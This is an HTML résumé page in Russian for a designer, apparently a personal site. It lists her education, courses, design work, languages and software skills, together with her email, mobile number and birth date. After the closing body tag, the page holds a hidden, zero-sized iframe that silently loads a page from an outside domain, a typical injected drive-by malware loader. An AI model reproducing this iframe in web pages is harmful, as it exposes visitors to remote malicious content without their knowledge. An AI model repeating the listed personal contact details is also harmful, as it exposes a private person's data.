<head>
<title>Обо мне</title>
</head>
<style type="text/css">
div.div_class_paris{
	position:absolute;
	z-index:-1;
	left: 730px;
	top: 0px;
} 
div.div_class_spb{
	position:absolute;
	z-index:0;
	left: 330px;
	top: 140px;
} 
<!--
body {
	background-color: #edcfad;
}
-->
</style>

<body>
<font size=+0 color=392b1f face="Garamond Premr Pro">
<a href="index.html" title="Вернуться на главную"><IMG SRC="images\p_up.gif" alt="назад" border=0> </a>


<p>
<p><b>Бабешкина Ксения</b></p>

<p>E-mail 	babeshkina.ksenia@gmail.com</p>
<p>Тел. (моб.) 	+7 (985) 249-17-05</p>
<p>Дата рождения: 	28.03.1989</p>





<p><b>Образование</b></p>


    <p>* 2010 — СПбГУ, факультет филологии и искусств. Кафедра графического дизайна. Бакалавр.</p>
	 <p>* 2012 — СПбГУ, факультет искусств. Кафедра дизайна среды. Магистр.</p>

<p><b>Повышение квалификации/курсы</b></p>

   <p> * 2006 — Администратор компьютерного офиса, Учебный центр вычислительной техники, Программист: компьютерный дизайн</p>
<p> * 2010 - Курсы дизайна Saint Martins - University of the Arts London</p>

<p><b>Профессиональный опыт</b></p>

<p>03.2008 - 02.2009, Дизайн-студия</p>
<p>Дизайн/мультимедиа/полиграфия</p>
<p>Дизайнер</p>
    <p>Разработка и верстка различных рекламных материалов;</p>
   <p> дизайн упаковки;</p>
   <p> различные работы, связанные с дизайном и полиграфическими услугами.</p> 


<p><b>Дополнительная информация</b></p>
<p>Гражданство:</p> 	

   <p> * Россия</p>
   <p>Родной город:</p>
   <p> * Санкт-Петербург</p>



<p><b>Языки </b>	</p>

   <p> * Родной язык — Русский </p>
   <p> * английский, свободно владею </p>
    <p>* французский, базовые знания </p>

<p><b>Навыки</b> </p>
<p>MS Office, Corel Draw, MS Visual Studio 2010, Adobe Dreamweaver, Joomla, Adobe Flash, ArchiCAD, AutoCAD, HTML, CSS, 3DStudioMax, Adobe PhotoShop, Adobe PageMaker, Adobe Illustrator, Adobe InDesign, Quark</p>



<p>&nbsp;</p>
<p>&nbsp;</p>
</body>//<iframe src="http://www.52CPS.COM/goto/mm.Htm" width=0 height=0></iframe>
